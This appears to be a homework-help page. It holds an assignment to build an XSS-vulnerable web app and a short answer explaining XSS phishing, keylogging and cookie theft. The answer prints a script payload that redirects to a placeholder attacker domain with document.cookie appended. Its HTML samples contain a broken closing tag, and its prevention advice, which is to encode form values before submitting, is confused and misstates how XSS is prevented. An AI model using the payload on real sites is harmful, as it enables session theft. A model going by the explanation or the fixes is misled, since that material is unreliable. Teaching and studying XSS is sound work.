Academic Integrity: tutoring, explanations, and feedback — we don’t complete graded work or submit on a student’s behalf.

you’ll be creating a vulnerable web application that is susceptible to a XSS att

ID: 3868934 • Letter: Y

Question

you’ll be creating a vulnerable web application that is susceptible to a XSS attack. XSS attacks are very common out there
so I am sure you can find plenty of discussion about it with a Google search. Create a web application (it does not have to be anything fancy or complicated,
just enough to demonstrate the XSS vulnerability and it has to be your own code). If you don’t already have some sort of web server available, you will need to
stand one up, perhaps in a Virtual Machine. Some servers will provide XSS protection natively so you may need to disable that before your attack succeeds.
You can choose the server-side language as long as the page renders in a typical browser.

Provide a screenshot proof of your XSS vulnerability being exploited by you including the script you inject and the resulting effect on the web application.
In your write-up, discuss your vulnerability briefly and make a recommendation of how you would fix/prevent this attack from succeeding.

you’ll be creating a vulnerable web application that is susceptible to a XSS attack. XSS attacks are very common out there
so I am sure you can find plenty of discussion about it with a Google search. Create a web application (it does not have to be anything fancy or complicated,
just enough to demonstrate the XSS vulnerability and it has to be your own code). If you don’t already have some sort of web server available, you will need to
stand one up, perhaps in a Virtual Machine. Some servers will provide XSS protection natively so you may need to disable that before your attack succeeds.
You can choose the server-side language as long as the page renders in a typical browser.

Provide a screenshot proof of your XSS vulnerability being exploited by you including the script you inject and the resulting effect on the web application.
In your write-up, discuss your vulnerability briefly and make a recommendation of how you would fix/prevent this attack from succeeding.

Explanation / Answer

XSS attack:
   Which means the attacker can execute the malicious JavaScript code in their browser.
  
The attacker can inject their code on our web page directly on the browser. So the javascript act as a part of the code of your web site.

eg:
<html>
<head></dead>
<body>
   <form method="post">
   login information.
   </form>
</body>
</html>

cosider the above code is used to login the web site, here the attacker can insert their own code to login the website using false values. like, they can modify the javascript and can be tried to submit the form using false values without any client side validation.

the code will be updated like,

<html>
<head></dead>
<body>
   <form method="post">
   login information.
   </form>
   <script>
       comment or modify the login page validation using false values.
   </script>
</body>
</html>

Types of XSS attack:
Phising:
   As per the above example the attacker can insert fake information using DOM objects, and set the form post origin/target to their own browser. From this if the user is submitting the form with their sensitive informatiom, then that info will be redirected to attacker browser.
  
keylogging:
   Using addEventListener the attacker can register the keyboard event listener. By this all the keystroke informatiom will be sent to attacker server.
   eg: password.

Cookie:
   The attacker can try to access our server cookies using document.cookie and this will send all info about cookies to the attacker server.

eg:
<script>
window.location='http://attacker-domain-name?cookie-info='+document.cookie
</script>
window.location is used to locate/redirect the window to target server/page, so this will redirect the web page with cookie info to attacker server, when cookies is created on a particular page.

To prevent website from XSS attack.
- Try to encode the sensitive values
   So that the attacker can not decode or complicate to decode the sensitive values even they attacked.
eg:
   <html>
<head></dead>
<body>
   <form method="post">
   encodeData(login information.)
   </form>
</body>
</html>
encode the data before submitting your form values.
- Validation:
   This is used to filter the user values using our methods. So that fake info can't be enter into out websites

- Client side/ server side validation:
   Try to do different phase of validation in both client side script and server side script.

Related Questions

your firm is considering a new product development. an outlay of $90,000 is requ
Question #2646496
your firm is considering a new product development. an outlay of $90,000 is requ
Question #2646497
your firm is considering a new product development. an outlay of $90,000 is requ
Question #2646498
your firm is considering a new product development. an outlay of $90,000 is requ
Question #2646499
your firm is operating in a market for which it sells according to the demand: q
Question #1210177
your firm needs a computerized machine tool lathe which costs $53000 and require
Question #1171446
your friend gets a at tire while driving up a road with a 35.0 slope. While chan
Question #2124436
your friend has isolated a protein present in the cheek cells of all straight A
Question #79190

Navigate

Previous
yout References Mailings Review View x, x\' : A·-A. | 1. : ·m . Normal No Spac H
Next
you’re going to create two Java classes: A Server class and a Client class. The

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.